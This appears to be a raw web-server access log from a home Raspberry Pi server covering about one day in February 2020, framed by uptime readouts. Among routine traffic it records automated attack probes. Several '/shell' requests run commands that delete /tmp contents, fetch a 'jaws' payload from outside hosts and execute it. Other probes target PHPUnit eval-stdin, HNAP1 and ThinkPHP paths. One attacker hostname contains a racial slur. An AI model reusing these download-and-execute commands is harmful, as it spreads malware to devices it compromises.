Sat Feb 8 06:25:07 MST 2020 06:25:07 up 7 days, 18:28, 1 user, load average: 0.63, 0.34, 0.38 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 7days 5:44 1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE 5.101.0.209 - - [08/Feb/2020:13:26:21 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 189.111.69.68 - - [08/Feb/2020:13:46:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 14.252.31.0 - - [08/Feb/2020:13:48:58 +0000] "GET / HTTP/1.1" 400 0 "" "" 18.144.155.185 - - [08/Feb/2020:13:57:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 37.120.143.214 - - [08/Feb/2020:14:28:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 37.120.143.214 - - [08/Feb/2020:14:28:10 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 37.120.143.214 - - [08/Feb/2020:14:28:21 +0000] "GET /readme.txt HTTP/1.1" 200 247 "http://162.250.19.7/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 37.120.143.214 - - [08/Feb/2020:14:28:33 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 120.24.228.224 - - [08/Feb/2020:14:39:26 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 36.234.85.72 - - [08/Feb/2020:14:45:45 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 36.234.85.72 - - [08/Feb/2020:14:45:46 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 91.187.138.98 - - [08/Feb/2020:15:00:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 193.150.73.200 - - [08/Feb/2020:15:56:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 115.58.72.183 - - [08/Feb/2020:16:34:15 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 198.211.10.10 - - [08/Feb/2020:16:41:35 +0000] "GET / HTTP/1.0" 200 25000 "" "" 217.23.32.157 - - [08/Feb/2020:17:26:17 +0000] "GET / HTTP/1.1" 400 0 "" "" 86.81.45.117 - - [08/Feb/2020:18:00:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 86.81.45.117 - - [08/Feb/2020:18:00:59 +0000] "GET / HTTP/1.1" 400 0 "" "" 92.14.156.86 - - [08/Feb/2020:18:02:37 +0000] "GET / HTTP/1.0" 200 25000 "" "" 139.162.153.48 - - [08/Feb/2020:18:19:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 139.162.153.48 - - [08/Feb/2020:18:19:44 +0000] "GET / HTTP/1.0" 200 25000 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:13 +0000] "GET / HTTP/1.0" 200 25000 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:22 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 104.248.175.47 - - [08/Feb/2020:18:20:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 119.7.171.247 - - [08/Feb/2020:19:44:06 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 119.7.171.247 - - [08/Feb/2020:19:44:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 168.0.81.185 - - [08/Feb/2020:19:59:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 178.93.46.66 - - [08/Feb/2020:20:31:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 109.94.0.189 - - [08/Feb/2020:21:11:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 46.8.141.126 - - [08/Feb/2020:21:32:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 118.68.115.76 - - [08/Feb/2020:21:34:37 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 118.68.115.76 - - [08/Feb/2020:21:34:37 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 188.119.30.79 - - [08/Feb/2020:21:38:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 118.97.73.114 - - [08/Feb/2020:23:49:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 222.186.19.221 - - [09/Feb/2020:00:00:02 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 113.128.104.169 - - [09/Feb/2020:00:01:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 27.224.136.156 - - [09/Feb/2020:00:02:01 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.01694878 Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0" 221.13.12.147 - - [09/Feb/2020:00:21:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 123.145.23.50 - - [09/Feb/2020:00:21:24 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 124.225.47.234 - - [09/Feb/2020:00:21:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 60.13.6.143 - - [09/Feb/2020:00:21:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 175.152.110.209 - - [09/Feb/2020:00:21:26 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 171.36.129.202 - - [09/Feb/2020:00:21:27 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 171.34.176.209 - - [09/Feb/2020:00:21:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 116.252.0.247 - - [09/Feb/2020:00:21:35 +0000] "GET /english/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 79.174.24.177 - - [09/Feb/2020:00:44:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 66.151.211.218 - - [09/Feb/2020:01:25:57 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 66.151.211.218 - - [09/Feb/2020:01:25:58 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 1.0.139.9 - - [09/Feb/2020:01:43:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 1.0.139.9 - - [09/Feb/2020:01:43:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 1.0.139.9 - - [09/Feb/2020:01:43:50 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 1.0.139.9 - - [09/Feb/2020:01:43:50 +0000] "POST /Admin0713faa2/Login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 106.12.69.27 - - [09/Feb/2020:01:56:51 +0000] "POST /html/SetSmarcardSettings.php HTTP/1.1" 400 0 "" "joxypoxy/7.2.6" 106.12.69.27 - - [09/Feb/2020:01:56:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 144.48.30.146 - - [09/Feb/2020:03:16:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 190.12.59.178 - - [09/Feb/2020:04:07:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 83.97.20.33 - - [09/Feb/2020:04:43:49 +0000] "GET / HTTP/1.0" 200 25000 "" "" 83.97.20.33 - - [09/Feb/2020:04:44:04 +0000] "UNKNOWN HTTP/1.0" 501 0 "" "" 83.97.20.33 - - [09/Feb/2020:04:44:19 +0000] "HEAD / HTTP/1.0" 200 0 "" "" 83.97.20.33 - - [09/Feb/2020:04:44:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 83.97.20.33 - - [09/Feb/2020:04:45:01 +0000] "UNKNOWN RTSP/1.0" 501 0 "" "" 83.97.20.33 - - [09/Feb/2020:04:45:16 +0000] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 0 "" "" 83.97.20.33 - - [09/Feb/2020:04:45:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.221.254.130 - - [09/Feb/2020:05:26:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.199.162.74 - - [09/Feb/2020:07:16:30 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 139.199.162.74 - - [09/Feb/2020:07:16:31 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:31 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:32 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:33 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:33 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:34 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:34 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 139.199.162.74 - - [09/Feb/2020:07:16:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 197.165.192.12 - - [09/Feb/2020:07:31:38 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 87.107.58.103 - - [09/Feb/2020:07:55:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 190.122.152.146 - - [09/Feb/2020:09:22:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.162.106.181 - - [09/Feb/2020:09:25:41 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 103.135.38.128 - - [09/Feb/2020:10:18:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.84.220.210 - - [09/Feb/2020:10:24:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 180.96.14.25 - - [09/Feb/2020:11:20:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 180.96.14.25 - - [09/Feb/2020:11:20:04 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:05 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:05 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:07 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:08 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:09 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:09 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:10 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 180.96.14.25 - - [09/Feb/2020:11:20:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 165.16.37.160 - - [09/Feb/2020:12:40:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 179.107.197.115 - - [09/Feb/2020:12:57:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 63.143.35.230 - - [09/Feb/2020:12:59:09 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 63.143.35.230 - - [09/Feb/2020:12:59:09 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" Sun Feb 9 06:25:13 MST 2020 06:25:13 up 8 days, 18:28, 1 user, load average: 0.57, 0.28, 0.38 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 8days 6:19 1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE